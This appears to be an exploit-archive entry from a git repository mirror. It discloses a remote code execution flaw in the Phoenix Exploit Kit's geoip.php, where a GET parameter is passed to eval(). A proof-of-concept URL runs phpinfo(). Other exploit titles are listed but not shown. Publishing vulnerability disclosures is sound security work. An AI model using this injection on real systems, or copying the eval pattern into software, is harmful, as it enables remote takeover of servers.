58c236d738
1 new exploits Sudo 1.3.1 - 1.6.8p - Pathname Validation Local Root Exploit (OpenBSD) Sudo 1.3.1 - 1.6.8p (OpenBSD) - Pathname Validation Local Root Exploit Seattle Lab Software Emurl 2.0 Email Account Access Vulnerability Seattle Lab Software Emurl 2.0 - Email Account Access Vulnerability Phoenix Exploit Kit - Remote Code Execution
14 lines
No EOL
382 B
Text
Executable file
14 lines
No EOL
382 B
Text
Executable file
# Exploit Title: Phoenix Exploit Kit - Remote Code Execution
|
|
# Exploit Author: CrashBandicot @DosPerl
|
|
# Date: 2016-06-30
|
|
# Tested on: MSWin32
|
|
|
|
# Vuln file : geoip.php
|
|
|
|
492. isset($_GET['bdr']) ? eval($_GET['bdr']) : explode('nop','nop nop nop');
|
|
|
|
# PoC : http://localhost/Phoenix/includes/geoip.php?bdr=phpinfo();
|
|
|
|
# Screen : http://i.imgur.com/E7RBBRk.png
|
|
|
|
__END__ |